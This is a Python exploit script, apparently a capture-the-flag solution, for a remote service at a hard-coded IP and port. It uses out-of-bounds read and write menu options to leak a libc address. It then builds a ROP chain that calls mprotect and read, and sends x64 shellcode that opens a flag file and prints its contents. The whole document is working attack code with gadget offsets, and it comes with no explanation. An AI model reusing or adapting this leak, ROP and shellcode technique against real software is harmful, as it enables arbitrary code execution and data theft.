import phun import time def cmd(idx): r.read('Choice') r.sendline(str(idx)) def peek(addr): cmd(1) r.read('Idx?') r.sendline('{:d}'.format(addr)) r.read('is: ') d = r.readline().strip() d = int(d) return d def poke(addr,val): cmd(2) r.read('Idx?') r.sendline('{:d}'.format(addr)) r.read('number:') r.sendline('{:d}'.format(val)) gadgets = [{ 'offset' : 0x20300, 'poprsi' : 0x1fcbd, 'poprdi' : 0x0001fd7a, 'poprdx' : 0x1b92, 'read': 0xf8880, 'mprotect' : 0x102ca0, },{ 'offset' : 0x20740, 'poprsi' : 0x202e8, 'poprdi' : 0x21102, 'poprdx' : 0x01b92, 'read': 0xf6670, 'mprotect' : 0x100b80 }] is_local = 0 if is_local: r = phun.Remote('192.168.122.234',1234) else: r = phun.Remote('52.192.178.153',31337) o_ret = 200 + 1 + 2 ret = peek(o_ret) libc_start_main = ret - 0xf1 + is_local libc = libc_start_main - gadgets[int(is_local)]['offset'] print 'Return is {:08x}'.format(ret) print('libc is {:08x}'.format(libc)) # ebfe = libc + 0x224f4 # mmap = libc + 0x102ba0 # system = libc + 0x456a0 if is_local: raw_input('e') poprsi = libc + gadgets[int(is_local)]['poprsi'] poprdi = libc + gadgets[int(is_local)]['poprdi'] poprdx = libc + gadgets[int(is_local)]['poprdx'] mprotect = libc + gadgets[int(is_local)]['mprotect'] read = libc + gadgets[int(is_local)]['read'] i = o_ret for _ in range(10): poke(i, poprdi+1) i += 1 ## overwrite rip for p in (poprdi,libc,poprsi,0x1000,poprdx,6,mprotect): poke(i,p) i+=1 for p in (poprdi,0,poprsi,libc,poprdx,1024,read): poke(i,p) i+=1 poke(i,libc) print 'rop setted up' path = '/home/artifact/flag' path = '\n'.join(map(lambda x: 'mov rax,%d\npush rax' % phun.u64(x), phun.chunks(path,8)[::-1])) print path p0 = phun.asm(''' %s mov rdx,2 mov rax,2 mov rsi,0 mov rdi,rsp syscall mov r14,rax mov rdi,r14 mov rsi,rsp mov rdx,0x1000 mov rax,0 syscall xor rdi,rdi inc rdi mov rsi,rsp mov rdx,0x1000 mov rax,rdi syscall ''' % path,arch='x64') cmd(3) time.sleep(0.1) # .write(payload) # time.sleep(0.1) r.write(p0) print r.read()